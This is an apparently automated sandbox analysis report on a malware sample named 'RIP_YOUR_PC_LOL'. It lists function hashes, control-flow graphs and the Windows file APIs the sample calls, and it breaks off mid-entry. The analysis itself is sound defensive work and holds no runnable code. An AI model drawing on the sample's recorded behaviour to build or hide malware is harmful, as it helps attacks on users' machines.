                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: edf9c0d8a9e0ff5379d8e4130987c5d9a4ebdc30ba7f4e8c9cba256f48b8e74f
                                                                                                          • Instruction ID: 9fd25c56056099479bc049afb71c4322ec5e835fcd73bb60394530c9b64e1dcf
                                                                                                          • Opcode Fuzzy Hash: edf9c0d8a9e0ff5379d8e4130987c5d9a4ebdc30ba7f4e8c9cba256f48b8e74f
                                                                                                          • Instruction Fuzzy Hash: F9F0AF39908244CFDB118F19E889766FFA0EF04320F0CC09ADD898F356D279A408DEB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 04340569 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 109 4340569-43405fa 119 4340625-434063e 109->119 120 43405fc-4340619 109->120 122 4340640 119->122 123 4340649 119->123 126 4340620-4340623 120->126 122->123 126->119 126->120
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $gEq
                                                                                                          • API String ID: 0-3917529146
                                                                                                          • Opcode ID: 24652d5f3c054f145e57a5165312442d36085a39e6ea1a5ce0bdb364cc846667
                                                                                                          • Instruction ID: 47bb552823e94cd8ec296663e25298e405de20fed521087196f0e567e341607a
                                                                                                          • Opcode Fuzzy Hash: 24652d5f3c054f145e57a5165312442d36085a39e6ea1a5ce0bdb364cc846667
                                                                                                          • Instruction Fuzzy Hash: 20219070F002069BEB589F7984A4BEDBBF6AFC8304F14446DD542E7391DE75AC058B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 04340070 Relevance: .2, Instructions: 161COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 127 4340070-434007f 173 4340085 call 4340006 127->173 174 4340085 call 4340070 127->174 175 4340085 call 4340140 127->175 176 4340085 call 21a05cf 127->176 177 4340085 call 21a05f6 127->177 128 434008b-43400b1 131 43400b3-43400c9 128->131 132 43400de-43400f0 128->132 133 4340135-4340192 131->133 134 43400cb-43400dc 131->134 132->133 139 43400f2-4340123 132->139 144 4340199-43401af 133->144 134->131 134->132 147 434012d-4340134 139->147 149 43401b1-43401bd 144->149 150 4340222-4340235 144->150 155 43401bf-43401c5 149->155 156 43401cb-43401cd 149->156 151 4340248-434024c 150->151 152 4340257 151->152 153 434024e 151->153 159 4340258 152->159 153->152 160 43401c7 155->160 161 43401c9 155->161 157 4340237-4340241 156->157 158 43401cf-43401db 156->158 157->150 164 4340243 157->164 165 43401f5-4340200 158->165 166 43401dd-43401e3 158->166 159->159 160->156 161->156 164->149 165->157 171 4340202-4340220 165->171 167 43401e5 166->167 168 43401e7-43401f3 166->168 167->165 168->165 171->151 173->128 174->128 175->128 176->128 177->128
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5a302c755974fd205d4d25d891e2618f8ab787c915ad0dd5c9d6eb26b1dcc8c1
                                                                                                          • Instruction ID: 21436d6c2157c28b9a9e2cd3532ca55bb31732c770b02992241f4ce800d073c5
                                                                                                          • Opcode Fuzzy Hash: 5a302c755974fd205d4d25d891e2618f8ab787c915ad0dd5c9d6eb26b1dcc8c1
                                                                                                          • Instruction Fuzzy Hash: 5651B634B0021ACFCB199B798454BAE7AF6AFC8310F148569D515EB785DF74BC01CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 043402F0 Relevance: .1, Instructions: 125COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 178 43402f0-43403ba 190 43403f5-43403fe 178->190 191 4340424-434042d 190->191 192 4340400-4340406 190->192 194 434042f 191->194 195 4340439-4340448 191->195 192->191 193 4340408-4340411 192->193 196 4340467 193->196 197 4340413-4340422 193->197 194->195 198 434044a-434044c 195->198 201 434046c 196->201 197->198 199 4340452-4340465 198->199 200 43403bc-43403c2 call 4340569 198->200 199->201 202 43403c8-43403d3 200->202 205 434046d 201->205 203 43403d5-43403d9 202->203 204 43403e0-43403f2 202->204 203->204 204->190 205->205
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b933a988c8392a9f9cb2ec71dc8f4f124ad520ebe1c7a49a10a5ae6a2c8faa83
                                                                                                          • Instruction ID: c8b2a0c3537f9f2d80a22f4a3fa94e013254104356042cfbf1d7d6da74a1e0f1
                                                                                                          • Opcode Fuzzy Hash: b933a988c8392a9f9cb2ec71dc8f4f124ad520ebe1c7a49a10a5ae6a2c8faa83
                                                                                                          • Instruction Fuzzy Hash: 0E410934B00609DFCB09DFA8C49099EBBF2EF88710B248569D915AB355DB34AC42CFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 04340006 Relevance: .1, Instructions: 124COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 208 4340006-434007f 255 4340085 call 4340006 208->255 256 4340085 call 4340070 208->256 257 4340085 call 4340140 208->257 258 4340085 call 21a05cf 208->258 259 4340085 call 21a05f6 208->259 210 434008b-43400b1 213 43400b3-43400c9 210->213 214 43400de-43400f0 210->214 215 4340135-4340192 213->215 216 43400cb-43400dc 213->216 214->215 221 43400f2-4340123 214->221 226 4340199-43401af 215->226 216->213 216->214 229 434012d-4340134 221->229 231 43401b1-43401bd 226->231 232 4340222-4340235 226->232 237 43401bf-43401c5 231->237 238 43401cb-43401cd 231->238 233 4340248-434024c 232->233 234 4340257 233->234 235 434024e 233->235 241 4340258 234->241 235->234 242 43401c7 237->242 243 43401c9 237->243 239 4340237-4340241 238->239 240 43401cf-43401db 238->240 239->232 246 4340243 239->246 247 43401f5-4340200 240->247 248 43401dd-43401e3 240->248 241->241 242->238 243->238 246->231 247->239 253 4340202-4340220 247->253 249 43401e5 248->249 250 43401e7-43401f3 248->250 249->247 250->247 253->233 255->210 256->210 257->210 258->210 259->210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8a2e3ede783fa7e93df6953233ab9e069da0d832f87d5922c9f01a6bef584522
                                                                                                          • Instruction ID: 976dae381daccd11aa962d144c05bb1d2729d3d72b9d83d6c9f8e8b2aef37a64
                                                                                                          • Opcode Fuzzy Hash: 8a2e3ede783fa7e93df6953233ab9e069da0d832f87d5922c9f01a6bef584522
                                                                                                          • Instruction Fuzzy Hash: 3741E77460E3C69FD7078B7498606AABFF1AF87214B1A40E7D485DF1A3C624AC05C772
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 043408C0 Relevance: .1, Instructions: 88COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 43408c0-43408ea 262 43408ec-43408fb 260->262 263 434095e-434096f 260->263 266 4340932 262->266 267 43408fd-434090c 262->267 268 4340971-434097b 263->268 269 434097d 263->269 273 434093c-434093e 266->273 275 4340940-434094c 267->275 276 434090e-434091d 267->276 270 4340982-4340984 268->270 269->270 271 4340986-4340998 270->271 272 43409ac-43409c5 270->272 271->272 285 434099a-43409a5 271->285 273->263 275->263 282 434094e-4340955 276->282 283 434091f-434092e 276->283 282->263 289 4340957-434095c 283->289 290 4340930 283->290 285->272 289->263 290->263
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 081abb9302932f12232896ae5ae2919ff467c6798680c9d1e6ffac092f58a193
                                                                                                          • Instruction ID: dea675a5b74ba471ecfef7da1fb151be44936d8a556b478ab0e801e90923ebb9
                                                                                                          • Opcode Fuzzy Hash: 081abb9302932f12232896ae5ae2919ff467c6798680c9d1e6ffac092f58a193
                                                                                                          • Instruction Fuzzy Hash: 8221D03AB1021387EF2D56B194202BE32E65BC4164B54A638CF4A9B354FE35EC42C7E5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 04340751 Relevance: .1, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98604673a9f934a7933dd454831a812d64e95fc24038cd6054257fe33068ffe7
                                                                                                          • Instruction ID: 75c43629ba277ed37677367b55564539f431a0c161e8161417d1ef6dd692cc89
                                                                                                          • Opcode Fuzzy Hash: 98604673a9f934a7933dd454831a812d64e95fc24038cd6054257fe33068ffe7
                                                                                                          • Instruction Fuzzy Hash: DF215A35F012198BDB299B6585646EE7BF6ABC8360F145429DA06E7380DB78A801CFD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 04340140 Relevance: .1, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 27a4189bbc7e7335dc6e23836edd7a39429f23705fceef6cc3399c00d0240ea4
                                                                                                          • Instruction ID: 7e6585626805b673a71162ec0bfca4115bd9ec8fe09c9ecfd712a1f34b75a210
                                                                                                          • Opcode Fuzzy Hash: 27a4189bbc7e7335dc6e23836edd7a39429f23705fceef6cc3399c00d0240ea4
                                                                                                          • Instruction Fuzzy Hash: 64219F38F00259CBCB299F7884586BE7AF66FC8350F185029CA11E7681DF34A841CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0434046F Relevance: .1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e19fb184ed95cdefff6ae9e1cc4c42cbbf261f2bfed6a104756529d9f99faf1
                                                                                                          • Instruction ID: f181e440f390028e0a16b08386186262aa63766e02fd8374e3068306bda1264c
                                                                                                          • Opcode Fuzzy Hash: 6e19fb184ed95cdefff6ae9e1cc4c42cbbf261f2bfed6a104756529d9f99faf1
                                                                                                          • Instruction Fuzzy Hash: 9E31A234E04609DBDB09CF99D48099DBBF2BF89310F219869E905AB355DB31B842CF40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 043406A0 Relevance: .1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7a49e9edafc4e3fb00321f1fb02e6d3caee9405d2cb341c7009abed3f679766d
                                                                                                          • Instruction ID: 6b656c0d0a748b759e8a7a76b8f29bbf9b0d017760fea0bb0cd34957fc004039
                                                                                                          • Opcode Fuzzy Hash: 7a49e9edafc4e3fb00321f1fb02e6d3caee9405d2cb341c7009abed3f679766d
                                                                                                          • Instruction Fuzzy Hash: B8118638F001158BCF59DB7584105EEBAF7ABC81507604469D909E7340FF34AD02CBE6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 021A05CF Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.694006679.00000000021A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_21a0000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d09708bd4f3645cf84ba5e788dc7c886317a219a5300f1123f75329830ad172a
                                                                                                          • Instruction ID: 8b48727d33edcfa165ce5130c689e445692c0c9f532f5f01dbe0cb33b11cb4d7
                                                                                                          • Opcode Fuzzy Hash: d09708bd4f3645cf84ba5e788dc7c886317a219a5300f1123f75329830ad172a
                                                                                                          • Instruction Fuzzy Hash: 4701D8B650C3806FD7118F16DC54863BFB8EF86230709C4AFEC498B612D225B909CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0434068F Relevance: .0, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 20504aee6fff837d09e1c696b6bb03ae49677e5df9101e1af03897559fcf0cf0
                                                                                                          • Instruction ID: 8327521054c4ad8b3ca1ba47f3bef452f5b8f4e236ac840abb590bc165fbc433
                                                                                                          • Opcode Fuzzy Hash: 20504aee6fff837d09e1c696b6bb03ae49677e5df9101e1af03897559fcf0cf0
                                                                                                          • Instruction Fuzzy Hash: EFF0A476F001558FCB64DB7C58811EEBBF6EB9C210B60403AC60DE3200FA319A038F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 021A05F6 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.694006679.00000000021A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_21a0000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 99eb574678cc25eed2da2e59760a6a0d77ce24399e5b16796f2354f78621a3f7
                                                                                                          • Instruction ID: 2aeb1cd7e8052e093aefeca6455e8e15a17e5fcbdf9db76ad621645cdf985c14
                                                                                                          • Opcode Fuzzy Hash: 99eb574678cc25eed2da2e59760a6a0d77ce24399e5b16796f2354f78621a3f7
                                                                                                          • Instruction Fuzzy Hash: 38E06DB66046004B9650CF0AEC41852F798EB88630B18C06FDC0D8B711E139B5048EB5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:21.5%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:29
                                                                                                          Total number of Limit Nodes:2
                                                                                                          execution_graph 905 148a528 907 148a536 FindCloseChangeNotification 905->907 908 148a5a4 907->908 873 148a56a 874 148a5d5 873->874 875 148a596 FindCloseChangeNotification 873->875 874->875 876 148a5a4 875->876 901 148a41b 902 148a452 CreateFileW 901->902 904 148a4d9 902->904 893 148a2dc 895 148a2fe SetErrorMode 893->895 896 148a33f 895->896 877 148a2fe 878 148a32a SetErrorMode 877->878 879 148a353 877->879 880 148a33f 878->880 879->878 881 148a452 882 148a48a CreateFileW 881->882 884 148a4d9 882->884 897 148a5e3 898 148a616 GetFileType 897->898 900 148a678 898->900 909 148a6a4 911 148a6d6 WriteFile 909->911 912 148a73d 911->912 885 148a6d6 886 148a70b WriteFile 885->886 888 148a73d 886->888

                                                                                                          Callgraph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          • Opacity -> Relevance
                                                                                                          • Disassembly available
                                                                                                          callgraph 0 Function_017A067A 1 Function_00905E91 2 Function_0148AA4E 3 Function_017A087D 4 Function_017A0070 4->4 31 Function_017A0140 4->31 48 Function_017A0014 4->48 91 Function_031205CF 4->91 92 Function_031205F6 4->92 5 Function_017A0276 6 Function_01482044 7 Function_017A0574 8 Function_017A0875 9 Function_01482458 10 Function_017A056B 11 Function_0148A85A 12 Function_017A0769 13 Function_03120001 14 Function_017A0562 15 Function_0148A452 16 Function_017A0664 17 Function_0312000C 18 Function_017A025A 19 Function_0148A56A 20 Function_017A085F 21 Function_0148A361 22 Function_03120638 34 Function_0312065A 22->34 23 Function_0148A262 24 Function_01482264 25 Function_01482364 26 Function_0148A965 27 Function_0148A078 28 Function_0148A978 29 Function_0148A77F 30 Function_009069A9 32 Function_0148A172 33 Function_009024D5 35 Function_0148A005 36 Function_01482006 37 Function_0312025D 38 Function_0148A41B 39 Function_0148AA1B 40 Function_01482310 41 Function_017A0726 42 Function_0148A616 43 Function_009466CB 44 Function_0148A528 45 Function_0148A02E 46 Function_0148A82E 47 Function_0148A120 48->4 48->31 48->48 48->91 48->92 49 Function_00904BFF 50 Function_0148213C 51 Function_01482430 52 Function_0312066F 53 Function_0312006D 54 Function_0148A8C8 55 Function_017A02F0 100 Function_017A0580 55->100 56 Function_00908A00 57 Function_0148A2DC 58 Function_014820D0 59 Function_017A02E0 59->100 60 Function_0148A6D6 61 Function_017A08D8 62 Function_00904938 63 Function_00905438 64 Function_0148A5E3 65 Function_031205BF 66 Function_0090713D 67 Function_00905722 68 Function_00907225 69 Function_0148A2FE 70 Function_00903628 71 Function_014821F0 72 Function_0148A8F2 73 Function_0148A1F4 74 Function_014823F4 75 Function_031205AF 76 Function_017A02BA 77 Function_017A06B8 77->12 77->61 78 Function_00904852 79 Function_017A08BD 80 Function_0090815B 81 Function_017A08B6 82 Function_01482098 83 Function_017A08AB 84 Function_0148A09A 85 Function_0148A99A 86 Function_0148A392 87 Function_017A06A0 88 Function_017A02A6 89 Function_01482194 90 Function_017A06A7 90->12 90->61 93 Function_0148A6A4 94 Function_017A0694 95 Function_0148A7BA 96 Function_017A0489 96->77 96->90 96->91 96->92 97 Function_014823BC 98 Function_017A028C 99 Function_00904968 101 Function_014822B4 102 Function_0090576E

                                                                                                          Executed Functions

                                                                                                          Function 0148A41B Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 148a41b-148a4aa 4 148a4ac 0->4 5 148a4af-148a4bb 0->5 4->5 6 148a4bd 5->6 7 148a4c0-148a4c9 5->7 6->7 8 148a51a-148a51f 7->8 9 148a4cb-148a4ef CreateFileW 7->9 8->9 12 148a521-148a526 9->12 13 148a4f1-148a517 9->13 12->13
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0148A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: eaaf02ceef6912e20653c5c11c85ad16847a15c042329cf3e178971415a5dd14
                                                                                                          • Instruction ID: dcba375103815a851a431ad68967c6c04d650faf10811eba4ad74bf6d8f5233e
                                                                                                          • Opcode Fuzzy Hash: eaaf02ceef6912e20653c5c11c85ad16847a15c042329cf3e178971415a5dd14
                                                                                                          • Instruction Fuzzy Hash: 2E31BEB1505380AFE722CF25DC44B66BFE8EF06214F0884AAE9849B262D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A452 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 16 148a452-148a4aa 19 148a4ac 16->19 20 148a4af-148a4bb 16->20 19->20 21 148a4bd 20->21 22 148a4c0-148a4c9 20->22 21->22 23 148a51a-148a51f 22->23 24 148a4cb-148a4d3 CreateFileW 22->24 23->24 26 148a4d9-148a4ef 24->26 27 148a521-148a526 26->27 28 148a4f1-148a517 26->28 27->28
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0148A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 16e9dcec0f5515d78fec618e91f444fc8e216ac85f217b554c37d36d5f1d69a8
                                                                                                          • Instruction ID: 1545646972737d8071db2601388ba8641c5a854e5e7b41d25eab08b7a0a283d9
                                                                                                          • Opcode Fuzzy Hash: 16e9dcec0f5515d78fec618e91f444fc8e216ac85f217b554c37d36d5f1d69a8
                                                                                                          • Instruction Fuzzy Hash: F021B271500600AFEB21DF69DC45B6BFBE8EF04610F14856EEE459B252D375E409CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A6A4 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 31 148a6a4-148a72d 35 148a72f-148a74f WriteFile 31->35 36 148a771-148a776 31->36 39 148a778-148a77d 35->39 40 148a751-148a76e 35->40 36->35 39->40
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 11b54c776acbcf3ec685f06b36b01eb9fcd393526050087e261500ff127fd3f4
                                                                                                          • Instruction ID: af60c7d21705c3982440f85dee3a46a6fcb366ae6322dd9b83f2cff0eda10cbf
                                                                                                          • Opcode Fuzzy Hash: 11b54c776acbcf3ec685f06b36b01eb9fcd393526050087e261500ff127fd3f4
                                                                                                          • Instruction Fuzzy Hash: 55219071409380AFE7228F61DC45F56BFB8EF46310F19859BED859F163C268A509CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A5E3 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 43 148a5e3-148a661 47 148a663-148a676 GetFileType 43->47 48 148a696-148a69b 43->48 49 148a678-148a695 47->49 50 148a69d-148a6a2 47->50 48->47 50->49
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: e348510d4b6d07f8aba4300273c56384fb57ffbe5f9f2723368a8b706f36a04e
                                                                                                          • Instruction ID: 9064a61f39b3f0bf326b8bd2d41558224f7a7313a6b32fb49acd9773c1c64ab5
                                                                                                          • Opcode Fuzzy Hash: e348510d4b6d07f8aba4300273c56384fb57ffbe5f9f2723368a8b706f36a04e
                                                                                                          • Instruction Fuzzy Hash: 9521D8754083806FE7138B61DC40BA6BFA8DF46310F1884DBED849F253D268A909DB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A528 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 54 148a528-148a534 55 148a54e-148a594 54->55 56 148a536-148a54d 54->56 58 148a5d5-148a5da 55->58 59 148a596-148a59e FindCloseChangeNotification 55->59 56->55 58->59 60 148a5a4-148a5b6 59->60 62 148a5b8-148a5d4 60->62 63 148a5dc-148a5e1 60->63 63->62
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0148A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: e49aa476da7ee2889f765a3c9841eb7cfb4b60b70946f4375be0746b7faeb166
                                                                                                          • Instruction ID: c616c75f09f468c065b7060b4e64965d6fc0662c150bb04f2beae5b2124ed314
                                                                                                          • Opcode Fuzzy Hash: e49aa476da7ee2889f765a3c9841eb7cfb4b60b70946f4375be0746b7faeb166
                                                                                                          • Instruction Fuzzy Hash: ED21AF7540E7C49FD7138B259C95696BFB4EF03220F1980EBDC858F2A3D2689948CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0148A6D6 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
